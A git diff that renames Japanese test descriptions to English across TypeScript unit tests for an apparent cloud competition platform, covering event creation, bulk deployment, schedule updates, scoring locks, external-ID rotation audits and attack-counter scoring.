     setVerifiedAccounts(new Set(["111111111111"]));
@@ -722,7 +722,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // Phase 2.2: 全 team が unverified なら write も publish もしない (fail-closed)
-  it("全 team が unverified なら write / publish せず enqueued=0 で返すべき", async () => {
+  it("should return enqueued=0 without write / publish when all teams are unverified", async () => {
     const { shared, ddbSend, eventsSend, setVerifiedAccounts } = buildShared();
     setVerifiedAccounts(new Set()); // verified なし
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
@@ -740,7 +740,7 @@ describe("bulkDeployEvent", () => {
   });
 
   // Phase 2.2: DeployCreateRequested の detail に competitorRoleArn / externalIdParameterName を埋めるべき
-  it("DeployCreateRequested detail に AssumeRole 用の competitorRoleArn と externalIdParameterName を含めるべき", async () => {
+  it("should include competitorRoleArn and externalIdParameterName for AssumeRole in DeployCreateRequested detail", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleEvent() });
     ddbSend.mockResolvedValueOnce({ Items: sampleTeams(1) }); // T1 only
@@ -766,7 +766,7 @@ describe("bulkDeployEvent", () => {
   // useBulkDistributedMap=true + bulkDeployPayloadBucket 設定済のとき、 fan-out (= N×M
   // 個の DeployCreateRequested publish) ではなく S3 PutObject + 1 BulkDeployCreateRequested
   // publish に切替わるべき。
-  it("useBulkDistributedMap=true なら S3 PutObject + 1 BulkDeployCreateRequested に切替えるべき", async () => {
+  it("should switch to S3 PutObject + 1 BulkDeployCreateRequested when useBulkDistributedMap=true", async () => {
     const s3Send = vi.fn().mockResolvedValue({});
     const { shared, ddbSend, eventsSend } = buildShared({
       s3: { send: s3Send } as unknown as EventSharedResources["s3"],
@@ -809,7 +809,7 @@ describe("bulkDeployEvent", () => {
     expect(bulkDetail.itemCount).toBe(body.length);
   });
 
-  it("useBulkDistributedMap=true でも S3 PutObject が失敗したら 全 plan を FAILED に倒すべき", async () => {
+  it("should fall all plans to FAILED when S3 PutObject fails, even with useBulkDistributedMap=true", async () => {
     const s3Send = vi.fn().mockRejectedValue(new Error("S3 throttle"));
     const { shared, ddbSend, eventsSend } = buildShared({
       s3: { send: s3Send } as unknown as EventSharedResources["s3"],
@@ -828,7 +828,7 @@ describe("bulkDeployEvent", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("useBulkDistributedMap=false なら旧 fan-out 経路を維持すべき (= rollback safety)", async () => {
+  it("should keep the old fan-out path when useBulkDistributedMap=false (rollback safety)", async () => {
     const s3Send = vi.fn().mockResolvedValue({});
     const { shared, ddbSend, eventsSend } = buildShared({
       s3: { send: s3Send } as unknown as EventSharedResources["s3"],

--- a/infrastructure/test/problem-deploy/event-create.test.ts
+++ b/infrastructure/test/problem-deploy/event-create.test.ts
@@ -43,7 +43,7 @@ const sampleRequest = (over: Partial<CreateEventRequest> = {}): CreateEventReque
 describe("createEvent", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("Event 1 行 + Teams N 行を 1 つの TransactWrite で書くべき", async () => {
+  it("should write 1 Event row + N Teams rows in a single TransactWrite", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({});
 
@@ -88,7 +88,7 @@ describe("createEvent", () => {
     expect(out.status).toBe("DRAFT");
   });
 
-  it("teams の internalSlug 重複は DuplicateInternalSlugError を投げ TransactWrite を呼ばないべき", async () => {
+  it("should throw DuplicateInternalSlugError without calling TransactWrite on duplicate internalSlug in teams", async () => {
     const { shared, ddbSend } = buildShared();
     await expect(
       createEvent(
@@ -105,7 +105,7 @@ describe("createEvent", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("problems の problemId 重複は DuplicateProblemIdError を投げ TransactWrite を呼ばないべき", async () => {
+  it("should throw DuplicateProblemIdError without calling TransactWrite on duplicate problemIds in problems", async () => {
     const { shared, ddbSend } = buildShared();
     await expect(
       createEvent(
@@ -130,7 +130,7 @@ describe("createEvent", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("Teams Put には GSI1 (TENANT) と GSI2 (TEAMKEY) の attribute が必ず付くべき (sparse 失効に備えて)", async () => {
+  it("Teams Put should always attach GSI1 (TENANT) and GSI2 (TEAMKEY) attributes (against sparse expiry)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({});
 
@@ -144,7 +144,7 @@ describe("createEvent", () => {
     expect(teamItem?.GSI2SK).toBe("META");
   });
 
-  it("Event Put には GSI1 (TENANT / createdAt) が付き、新しい順 query を可能にするべき", async () => {
+  it("Event Put should attach GSI1 (TENANT / createdAt) to enable newest-first queries", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({});
 
@@ -156,7 +156,7 @@ describe("createEvent", () => {
     expect(eventItem?.GSI1SK).toMatch(/^\d{4}-\d{2}-\d{2}T/);
   });
 
-  it("ConditionExpression で同一 PK の二重生成を防ぐべき (defense in depth)", async () => {
+  it("should prevent double creation on the same PK via ConditionExpression (defense in depth)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({});
 

--- a/infrastructure/test/problem-deploy/event-end.test.ts
+++ b/infrastructure/test/problem-deploy/event-end.test.ts
@@ -32,7 +32,7 @@ function conditionalFailure(): Error {
 describe("endEvent", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: Event 行を ENDED に更新し全 deployment 行に eventEndsAt を伝播するべき", async () => {
+  it("normal case: should update the Event row to ENDED and propagate eventEndsAt to all deployment rows", async () => {
     const { shared, ddbSend } = buildShared();
     // 1st: Event UpdateCommand returns Attributes (= status=READY が条件を満たした)
     ddbSend.mockResolvedValueOnce({
@@ -98,7 +98,7 @@ describe("endEvent", () => {
     }
   });
 
-  it("status != READY (= DRAFT 等) なら not_endable で 409 相当を返すべき", async () => {
+  it("should return 409-equivalent not_endable when status != READY (e.g. DRAFT)", async () => {
     const { shared, ddbSend } = buildShared();
     // 1st: Event Update が ConditionalCheckFailed
     ddbSend.mockRejectedValueOnce(conditionalFailure());
@@ -116,7 +116,7 @@ describe("endEvent", () => {
     expect(ddbSend).toHaveBeenCalledTimes(2);
   });
 
-  it("Event 行不在 (probe で Item 無し) は not_found を返すべき", async () => {
+  it("should return not_found when the Event row is absent (probe finds no Item)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockRejectedValueOnce(conditionalFailure());
     ddbSend.mockResolvedValueOnce({ Item: undefined });
@@ -126,7 +126,7 @@ describe("endEvent", () => {
     expect(ddbSend).toHaveBeenCalledTimes(2);
   });
 
-  it("tenant 不一致 (probe で別 tenant) は not_found を返すべき (cross-tenant 漏洩防止)", async () => {
+  it("should return not_found on tenant mismatch (probe finds a different tenant) (cross-tenant leak guard)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockRejectedValueOnce(conditionalFailure());
     ddbSend.mockResolvedValueOnce({
@@ -154,7 +154,7 @@ describe("endEvent", () => {
     expect(updCmds).toHaveLength(0);
   });
 
-  it("Event 更新 + 全 deployment update の updatedAt は同じ now 値を使うべき", async () => {
+  it("should use the same now value for updatedAt across Event and all deployment updates", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Attributes: { eventId: "EV1", tenantId: "tenant-acme", status: "ENDED", endsAt: NOW_ISO },

--- a/infrastructure/test/problem-deploy/event-handler-shared.test.ts
+++ b/infrastructure/test/problem-deploy/event-handler-shared.test.ts
@@ -22,7 +22,7 @@ describe("queryDeploymentsByEvent (Issue #670)", () => {
     problemsCatalog: {},
   });
 
-  it("projection に `#s` が含まれるなら ExpressionAttributeNames で alias を提供すべき", async () => {
+  it("should provide an ExpressionAttributeNames alias when projection contains `#s`", async () => {
     const send = vi.fn().mockResolvedValue({ Items: [] });
     await queryDeploymentsByEvent(
       buildShared(send),

--- a/infrastructure/test/problem-deploy/event-list.test.ts
+++ b/infrastructure/test/problem-deploy/event-list.test.ts
@@ -23,7 +23,7 @@ function buildShared(): {
 describe("listEvents", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("GSI1 (TENANT#) を新しい順で query するべき", async () => {
+  it("should query GSI1 (TENANT#) in newest-first order", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -57,7 +57,7 @@ describe("listEvents", () => {
     });
   });
 
-  it("LastEvaluatedKey があれば nextCursor を base64url で返すべき", async () => {
+  it("should return nextCursor as base64url when LastEvaluatedKey is present", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [],
@@ -74,7 +74,7 @@ describe("listEvents", () => {
 describe("getEventDetail", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: Event + Teams を返し teamLoginKey も含むべき (詳細経路は露出する)", async () => {
+  it("normal case: should return Event + Teams including teamLoginKey (detail path exposes it)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {
@@ -128,7 +128,7 @@ describe("getEventDetail", () => {
     expect(deploymentsQuery.input.ExpressionAttributeValues?.[":pk"]).toBe("TENANT#tenant-acme");
   });
 
-  it("競技者が portal で設定した displayTeamName を Deployments から merge するべき", async () => {
+  it("should merge displayTeamName set by participants in the portal from Deployments", async () => {
     // ADR-004 Phase 2c 統合ギャップの再発防止。participant の PATCH /portal/me は
     // DeploymentsTable のみ書き込む (TeamsTable には書けない) ため、operator 側 read で
     // merge する必要がある。
@@ -174,7 +174,7 @@ describe("getEventDetail", () => {
     expect(JSON.stringify(out)).not.toContain("leak-from-other-event");
   });
 
-  it("Event 行が無ければ undefined を返し teams 結果を漏らさないべき", async () => {
+  it("should return undefined and not leak team results when the Event row is missing", async () => {
     // Get と Query は Promise.all で並列発火するため、Event 不在でも teams query
     // 自体は走る (空 partition なので 1 RCU 程度)。重要なのは結果が caller に返らないこと。
     const { shared, ddbSend } = buildShared();
@@ -188,7 +188,7 @@ describe("getEventDetail", () => {
     expect(out).toBeUndefined();
   });
 
-  it("tenantId 不一致は undefined を返し teams 結果を漏らさないべき (クロステナント漏洩防止)", async () => {
+  it("should return undefined and not leak team results on tenantId mismatch (cross-tenant leak guard)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {
@@ -206,7 +206,7 @@ describe("getEventDetail", () => {
     expect(out).toBeUndefined();
   });
 
-  it("Deployments の問題ごと jobId / teamId / status を deploymentsByProblem にまとめるべき", async () => {
+  it("should group per-problem jobId / teamId / status from Deployments into deploymentsByProblem", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {
@@ -280,7 +280,7 @@ describe("getEventDetail", () => {
     expect(out?.deploymentsByProblem).toEqual({});
   });
 
-  it("不明な status 値の deployment 行は deploymentsByProblem から除外するべき (防御的)", async () => {
+  it("should exclude deployment rows with unknown status values from deploymentsByProblem (defensive)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {

--- a/infrastructure/test/problem-deploy/event-lock-scoring.test.ts
+++ b/infrastructure/test/problem-deploy/event-lock-scoring.test.ts
@@ -29,7 +29,7 @@ function buildShared(): {
 describe("lockScoring", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("READY + 未 lock 状態のとき scoringLocked=true / scoringLockedAt / scoringLockedBy を SET し ok を返すべき", async () => {
+  it("should SET scoringLocked=true / scoringLockedAt / scoringLockedBy and return ok when READY and unlocked", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Attributes: { tenantId: "t1", status: "READY", scoringLocked: true },
@@ -54,7 +54,7 @@ describe("lockScoring", () => {
     expect(cmd.input.ConditionExpression).toContain("tenantId = :tenantId");
   });
 
-  it("ENDED 状態でも lock 可能であるべき (= 表彰フェーズ用途)", async () => {
+  it("should allow locking even in ENDED state (for the awarding phase)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Attributes: { tenantId: "t1", status: "ENDED", scoringLocked: true },
@@ -67,7 +67,7 @@ describe("lockScoring", () => {
     expect(cmd.input.ConditionExpression).toContain(":ended");
   });
 
-  it("ConditionalCheckFailed + 行不在のとき not_found を返すべき", async () => {
+  it("should return not_found on ConditionalCheckFailed + missing row", async () => {
     const { shared, ddbSend } = buildShared();
     const err = Object.assign(new Error("Condition"), { name: "ConditionalCheckFailedException" });
     ddbSend.mockRejectedValueOnce(err).mockResolvedValueOnce({ Item: undefined });
@@ -78,7 +78,7 @@ describe("lockScoring", () => {
     expect(ddbSend.mock.calls[1]?.[0]).toBeInstanceOf(GetCommand);
   });
 
-  it("ConditionalCheckFailed + tenant 不一致のとき not_found を返すべき (= tenant 跨ぎ防止)", async () => {
+  it("should return not_found on ConditionalCheckFailed + tenant mismatch (cross-tenant guard)", async () => {
     const { shared, ddbSend } = buildShared();
     const err = Object.assign(new Error("Condition"), { name: "ConditionalCheckFailedException" });
     ddbSend
@@ -90,7 +90,7 @@ describe("lockScoring", () => {
     expect(out).toEqual({ kind: "not_found" });
   });
 
-  it("ConditionalCheckFailed + status=DRAFT のとき not_lockable を返すべき", async () => {
+  it("should return not_lockable on ConditionalCheckFailed + status=DRAFT", async () => {
     const { shared, ddbSend } = buildShared();
     const err = Object.assign(new Error("Condition"), { name: "ConditionalCheckFailedException" });
     ddbSend
@@ -102,7 +102,7 @@ describe("lockScoring", () => {
     expect(out).toEqual({ kind: "not_lockable", status: "DRAFT" });
   });
 
-  it("ConditionalCheckFailed + 既に lock 済のとき already を返すべき (= idempotent)", async () => {
+  it("should return already on ConditionalCheckFailed when already locked (idempotent)", async () => {
     const { shared, ddbSend } = buildShared();
     const err = Object.assign(new Error("Condition"), { name: "ConditionalCheckFailedException" });
     ddbSend.mockRejectedValueOnce(err).mockResolvedValueOnce({
@@ -118,7 +118,7 @@ describe("lockScoring", () => {
 describe("unlockScoring", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("lock 済 + READY のとき scoringLocked を REMOVE し ok を返すべき", async () => {
+  it("should REMOVE scoringLocked and return ok when locked and READY", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Attributes: { tenantId: "t1", status: "READY" },
@@ -134,7 +134,7 @@ describe("unlockScoring", () => {
     expect(cmd.input.ConditionExpression).toContain("scoringLocked = :t");
   });
 
-  it("そもそも unlocked のとき already を返すべき (= idempotent)", async () => {
+  it("should return already when already unlocked (idempotent)", async () => {
     const { shared, ddbSend } = buildShared();
     const err = Object.assign(new Error("Condition"), { name: "ConditionalCheckFailedException" });
     ddbSend.mockRejectedValueOnce(err).mockResolvedValueOnce({
@@ -146,7 +146,7 @@ describe("unlockScoring", () => {
     expect(out).toEqual({ kind: "already", scoringLocked: false });
   });
 
-  it("status=ARCHIVED で lock=true のとき not_lockable を返すべき", async () => {
+  it("should return not_lockable when status=ARCHIVED and lock=true", async () => {
     const { shared, ddbSend } = buildShared();
     const err = Object.assign(new Error("Condition"), { name: "ConditionalCheckFailedException" });
     ddbSend.mockRejectedValueOnce(err).mockResolvedValueOnce({

--- a/infrastructure/test/problem-deploy/event-schedule.test.ts
+++ b/infrastructure/test/problem-deploy/event-schedule.test.ts
@@ -36,7 +36,7 @@ function mockCurrentEvent(
 describe("setEventSchedule (startsAt のみ、既存パターン)", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: Event 行 + 紐づく全 deployment 行の eventStartsAt を更新するべき", async () => {
+  it("normal case: should update eventStartsAt on the Event row and all linked deployment rows", async () => {
     const { shared, ddbSend } = buildShared();
     mockCurrentEvent(ddbSend);
     ddbSend.mockResolvedValueOnce({
@@ -130,7 +130,7 @@ describe("setEventSchedule (startsAt のみ、既存パターン)", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("startsAt が now - 30s (SLACK 内) なら通すべき (#537 clock skew)", async () => {
+  it("should pass when startsAt is now - 30s (within SLACK) (#537 clock skew)", async () => {
     const { shared, ddbSend } = buildShared();
     mockCurrentEvent(ddbSend);
     ddbSend.mockResolvedValueOnce({
@@ -145,7 +145,7 @@ describe("setEventSchedule (startsAt のみ、既存パターン)", () => {
     expect(out.kind).toBe("ok");
   });
 
-  it("Event 更新 + 全 deployment update の updatedAt は同じ now 値を使うべき", async () => {
+  it("should use the same now value for updatedAt across Event and all deployment updates", async () => {
     const { shared, ddbSend } = buildShared();
     mockCurrentEvent(ddbSend);
     ddbSend.mockResolvedValueOnce({
@@ -193,7 +193,7 @@ describe("setEventSchedule endsAt (#536 scheduled endsAt)", () => {
     expect(deployUpd.input.ExpressionAttributeValues?.[":s"]).toBeUndefined();
   });
 
-  it("startsAt + endsAt 両方指定 → 1 回の UpdateCommand で両方更新するべき", async () => {
+  it("should update both via a single UpdateCommand when startsAt + endsAt are both specified", async () => {
     const { shared, ddbSend } = buildShared();
     mockCurrentEvent(ddbSend);
     ddbSend.mockResolvedValueOnce({
@@ -249,7 +249,7 @@ describe("setEventSchedule endsAt (#536 scheduled endsAt)", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("endsAt のみ指定でも既存 startsAt 以前なら ends_before_starts で reject すべき (#741)", async () => {
+  it("should reject with ends_before_starts when only endsAt is set and is before existing startsAt (#741)", async () => {
     const { shared, ddbSend } = buildShared();
     const laterStart = "2026-05-08T13:00:00.000Z";
     mockCurrentEvent(ddbSend, { tenantId: "tenant-acme", startsAt: laterStart });
@@ -294,17 +294,17 @@ describe("setEventSchedule endsAt (#536 scheduled endsAt)", () => {
  * - startsAt / startNow / endsAt の組み合わせ refinement
  */
 describe("ScheduleEventRequestSchema", () => {
-  it("Z 終端の ISO 8601 はそのまま受理されるべき", () => {
+  it("should accept Z-terminated ISO 8601 as-is", () => {
     const out = ScheduleEventRequestSchema.parse({ startsAt: "2026-05-08T10:00:00.000Z" });
     expect(out.startsAt).toBe("2026-05-08T10:00:00.000Z");
   });
 
-  it("`+09:00` オフセットは UTC Z に transform されるべき", () => {
+  it("should transform a `+09:00` offset to UTC Z", () => {
     const out = ScheduleEventRequestSchema.parse({ startsAt: "2026-05-08T19:00:00+09:00" });
     expect(out.startsAt).toBe("2026-05-08T10:00:00.000Z");
   });
 
-  it("endsAt も同様にオフセットを Z に transform するべき (#536)", () => {
+  it("endsAt should likewise transform its offset to Z (#536)", () => {
     const out = ScheduleEventRequestSchema.parse({ endsAt: "2026-05-08T21:00:00+09:00" });
     expect(out.endsAt).toBe("2026-05-08T12:00:00.000Z");
   });

--- a/infrastructure/test/problem-deploy/external-id-audit-handler.test.ts
+++ b/infrastructure/test/problem-deploy/external-id-audit-handler.test.ts
@@ -35,7 +35,7 @@ function buildDeps(): {
 }
 
 describe("computeRotationAgeDays (pure)", () => {
-  it("rotatedAt が設定されていれば rotate からの経過日数を返すべき", () => {
+  it("should return days since rotate when rotatedAt is set", () => {
     // 7 日前 = 7 days ago。
     const sevenDaysAgo = new Date(NOW_MS - 7 * 24 * 60 * 60 * 1000).toISOString();
     expect(
@@ -46,20 +46,20 @@ describe("computeRotationAgeDays (pure)", () => {
     ).toBe(7);
   });
 
-  it("rotatedAt が無ければ createdAt からの経過日数で fallback するべき (= 初期発行から何日)", () => {
+  it("should fall back to days since createdAt when rotatedAt is missing (days since initial issuance)", () => {
     const thirtyDaysAgo = new Date(NOW_MS - 30 * 24 * 60 * 60 * 1000).toISOString();
     expect(computeRotationAgeDays({ createdAt: thirtyDaysAgo }, NOW_MS)).toBe(30);
   });
 
-  it("rotatedAt も createdAt も無い行は 0 を返すべき (= alarm 誤発火を防ぐ安全側)", () => {
+  it("should return 0 for rows without rotatedAt or createdAt (safe side, avoid spurious alarms)", () => {
     expect(computeRotationAgeDays({}, NOW_MS)).toBe(0);
   });
 
-  it("rotatedAt が parse 不能な文字列なら 0 を返すべき", () => {
+  it("should return 0 when rotatedAt is an unparseable string", () => {
     expect(computeRotationAgeDays({ rotatedAt: "not-a-date" }, NOW_MS)).toBe(0);
   });
 
-  it("rotatedAt が未来 (= clock skew) なら 0 を返すべき", () => {
+  it("should return 0 when rotatedAt is in the future (clock skew)", () => {
     const future = new Date(NOW_MS + 24 * 60 * 60 * 1000).toISOString();
     expect(computeRotationAgeDays({ rotatedAt: future }, NOW_MS)).toBe(0);
   });
@@ -68,7 +68,7 @@ describe("computeRotationAgeDays (pure)", () => {
 describe("collectRotationAges", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("DDB Scan の Items を datapoint に変換するべき", async () => {
+  it("should convert DDB Scan Items into datapoints", async () => {
     const { deps, ddbSend } = buildDeps();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -103,7 +103,7 @@ describe("collectRotationAges", () => {
     });
   });
 
-  it("LastEvaluatedKey が返れば 2 ページ目を Scan するべき", async () => {
+  it("should Scan a second page when LastEvaluatedKey is returned", async () => {
     const { deps, ddbSend } = buildDeps();
     ddbSend
       .mockResolvedValueOnce({
@@ -136,7 +136,7 @@ describe("collectRotationAges", () => {
     });
   });
 
-  it("tenantId / awsAccountId 欠落行は skip するべき (= 不整合データの混入を吸収)", async () => {
+  it("should skip rows missing tenantId / awsAccountId (absorb inconsistent data)", async () => {
     const { deps, ddbSend } = buildDeps();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -158,7 +158,7 @@ describe("collectRotationAges", () => {
 describe("emitRotationAgeMetrics", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("PutMetricData で TenkaCloud/CompetitorAccounts namespace に書くべき", async () => {
+  it("should write to the TenkaCloud/CompetitorAccounts namespace via PutMetricData", async () => {
     const { deps, cwSend } = buildDeps();
     cwSend.mockResolvedValueOnce({});
     await emitRotationAgeMetrics(deps, [
@@ -181,7 +181,7 @@ describe("emitRotationAgeMetrics", () => {
     ]);
   });
 
-  it("datapoint が空なら PutMetricData を呼ばないべき", async () => {
+  it("should not call PutMetricData when there are no datapoints", async () => {
     const { deps, cwSend } = buildDeps();
     await emitRotationAgeMetrics(deps, []);
     expect(cwSend).not.toHaveBeenCalled();
@@ -191,7 +191,7 @@ describe("emitRotationAgeMetrics", () => {
 describe("runAudit (integration)", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("Scan + PutMetricData を順に呼び、件数を返すべき", async () => {
+  it("should call Scan + PutMetricData in order and return the count", async () => {
     const { deps, ddbSend, cwSend } = buildDeps();
     ddbSend.mockResolvedValueOnce({
       Items: [

--- a/infrastructure/test/problem-deploy/external-id-store.test.ts
+++ b/infrastructure/test/problem-deploy/external-id-store.test.ts
@@ -19,7 +19,7 @@ function buildDeps(): { deps: ExternalIdStoreDeps; ssmSend: ReturnType<typeof vi
 }
 
 describe("getExternalIdWithVersion", () => {
-  it("Value + Version をペアで返すべき", async () => {
+  it("should return Value + Version as a pair", async () => {
     const { deps, ssmSend } = buildDeps();
     ssmSend.mockResolvedValueOnce({
       Parameter: { Value: "current-external-id", Version: 7 },
@@ -32,14 +32,14 @@ describe("getExternalIdWithVersion", () => {
     expect(cmd.input.WithDecryption).toBe(true);
   });
 
-  it("ParameterNotFound なら undefined を返すべき", async () => {
+  it("should return undefined on ParameterNotFound", async () => {
     const { deps, ssmSend } = buildDeps();
     ssmSend.mockRejectedValueOnce(Object.assign(new Error("nope"), { name: "ParameterNotFound" }));
     const out = await getExternalIdWithVersion(deps, "tenant-acme");
     expect(out).toBeUndefined();
   });
 
-  it("Value または Version が欠落していれば undefined を返すべき", async () => {
+  it("should return undefined when Value or Version is missing", async () => {
     const { deps, ssmSend } = buildDeps();
     ssmSend.mockResolvedValueOnce({ Parameter: { Value: "only-value" } });
     const out = await getExternalIdWithVersion(deps, "tenant-acme");
@@ -48,7 +48,7 @@ describe("getExternalIdWithVersion", () => {
 });
 
 describe("getExternalIdByVersion", () => {
-  it("Name に `:<version>` を付けて旧 version を取得するべき", async () => {
+  it("should fetch a previous version by appending `:<version>` to Name", async () => {
     const { deps, ssmSend } = buildDeps();
     ssmSend.mockResolvedValueOnce({ Parameter: { Value: "old-external-id" } });
     const value = await getExternalIdByVersion(deps, "tenant-acme", 6);
@@ -58,21 +58,21 @@ describe("getExternalIdByVersion", () => {
     expect(cmd.input.WithDecryption).toBe(true);
   });
 
-  it("version が 0 以下なら SSM を叩かず undefined を返すべき (= rotate 未経験 / 1 generation back 不存在)", async () => {
+  it("should return undefined without hitting SSM when version <= 0 (no rotation yet / no 1-generation-back)", async () => {
     const { deps, ssmSend } = buildDeps();
     expect(await getExternalIdByVersion(deps, "tenant-acme", 0)).toBeUndefined();
     expect(await getExternalIdByVersion(deps, "tenant-acme", -1)).toBeUndefined();
     expect(ssmSend).not.toHaveBeenCalled();
   });
 
-  it("ParameterNotFound なら undefined を返すべき", async () => {
+  it("should return undefined on ParameterNotFound", async () => {
     const { deps, ssmSend } = buildDeps();
     ssmSend.mockRejectedValueOnce(Object.assign(new Error("nope"), { name: "ParameterNotFound" }));
     const value = await getExternalIdByVersion(deps, "tenant-acme", 6);
     expect(value).toBeUndefined();
   });
 
-  it("ParameterVersionNotFound (= 100 version cap で auto-drop 済) も undefined を返すべき", async () => {
+  it("should also return undefined on ParameterVersionNotFound (auto-dropped at the 100-version cap)", async () => {
     const { deps, ssmSend } = buildDeps();
     ssmSend.mockRejectedValueOnce(
       Object.assign(new Error("version dropped"), { name: "ParameterVersionNotFound" }),
@@ -81,7 +81,7 @@ describe("getExternalIdByVersion", () => {
     expect(value).toBeUndefined();
   });
 
-  it("その他 error は再 throw するべき (= 握り潰し fallback 禁止)", async () => {
+  it("should re-throw other errors (no swallowing fallbacks)", async () => {
     const { deps, ssmSend } = buildDeps();
     ssmSend.mockRejectedValueOnce(Object.assign(new Error("throttled"), { name: "Throttling" }));
     await expect(getExternalIdByVersion(deps, "tenant-acme", 6)).rejects.toThrow("throttled");

--- a/infrastructure/test/problem-deploy/generic-scoring-attack-detection.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-attack-detection.test.ts
@@ -49,14 +49,14 @@ function buildInput(
 }
 
 describe("attack-detection kind", () => {
-  it("初回 tick (= prev 未設定) は baseline 記録のみで加点しないべき", () => {
+  it("first tick (prev unset) should only record baseline without awarding", () => {
     const result = runAttackDetectionKind(buildInput("5", undefined));
     expect(result.scoreDelta).toBe(0);
     expect(result.scoreEvents).toEqual([]);
     expect(result.newState).toEqual({ attackCount: 5 });
   });
 
-  it("counter が増えていれば差分 × pointsPerAttack を加点すべき", () => {
+  it("should award delta × pointsPerAttack when the counter increases", () => {
     // prev=5, current=8 → delta=3、 3 × 50 = 150 加点
     const result = runAttackDetectionKind(buildInput("8", 5));
     expect(result.scoreDelta).toBe(150);
@@ -64,44 +64,44 @@ describe("attack-detection kind", () => {
     expect(result.newState).toEqual({ attackCount: 8 });
   });
 
-  it("counter が変化なし (= 攻撃が止まっている) なら加点 0、 baseline は維持すべき", () => {
+  it("should award 0 and keep the baseline when the counter is unchanged (attack stopped)", () => {
     const result = runAttackDetectionKind(buildInput("5", 5));
     expect(result.scoreDelta).toBe(0);
     expect(result.scoreEvents).toEqual([]);
     expect(result.newState).toEqual({ attackCount: 5 });
   });
 
-  it("counter が巻き戻った場合は加点 0、 baseline を新値に追従すべき", () => {
+  it("should award 0 and follow the new baseline when the counter rewinds", () => {
     // prev=10, current=3 (reset?) → 加点なし、 baseline=3
     const result = runAttackDetectionKind(buildInput("3", 10));
     expect(result.scoreDelta).toBe(0);
     expect(result.newState).toEqual({ attackCount: 3 });
   });
 
-  it("statsOutputKey が stackOutputs に無いと noop になるべき (= deploy 未完了 / output 不在)", () => {
+  it("should noop when statsOutputKey is missing from stackOutputs (deploy not yet complete / output absent)", () => {
     const result = runAttackDetectionKind(buildInput(undefined, undefined));
     expect(result.scoreDelta).toBe(0);
     expect(result.scoreEvents).toEqual([]);
     expect(result.newState).toBeUndefined();
   });
 
-  it("counter が数値以外なら noop になるべき (= 不正データ防御)", () => {
+  it("should noop when counter is non-numeric (invalid-data guard)", () => {
     const result = runAttackDetectionKind(buildInput("not-a-number", 5));
     expect(result.scoreDelta).toBe(0);
   });
 
-  it("counter が負値なら noop になるべき (= 不正データ防御)", () => {
+  it("should noop when counter is negative (invalid-data guard)", () => {
     const result = runAttackDetectionKind(buildInput("-1", 0));
     expect(result.scoreDelta).toBe(0);
   });
 
-  it("counter が空文字なら noop になるべき (= Number('') = 0 で baseline 汚染防止)", () => {
+  it("should noop when counter is empty (Number('') = 0 baseline pollution guard)", () => {
     const result = runAttackDetectionKind(buildInput("", 5));
     expect(result.scoreDelta).toBe(0);
     expect(result.newState).toBeUndefined();
   });
 
-  it("counter が小数なら noop になるべき (= 不正データ防御)", () => {
+  it("should noop when counter is a decimal (invalid-data guard)", () => {
     const result = runAttackDetectionKind(buildInput("1.5", 1));
     expect(result.scoreDelta).toBe(0);
   });

--- a/infrastructure/test/problem-deploy/generic-scoring-dispatcher.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-dispatcher.test.ts
@@ -75,7 +75,7 @@ function sampleUptimeDeployment(over: Record<string, unknown> = {}) {
 }
 
 describe("generic scoring dispatcher: hello-world-battle (= legacy uptime) 挙動 preservation", () => {
-  it("scoring=uptime + 全 endpoint 200 で +100 加点し score-event を 1 件書くべき", async () => {
+  it("should award +100 and write 1 score-event when scoring=uptime + all endpoints return 200", async () => {
     process.env.BATTLE_PROBLEMS_SCORING = JSON.stringify({
       "hello-world-battle": {
         kind: "uptime",
@@ -144,7 +144,7 @@ describe("generic scoring dispatcher: hello-world-battle (= legacy uptime) 挙�
     expect(putCalls.length).toBe(1);
   });
 
-  it("scoring 設定が無い problemId は skip すべき (= 採点無効)", async () => {
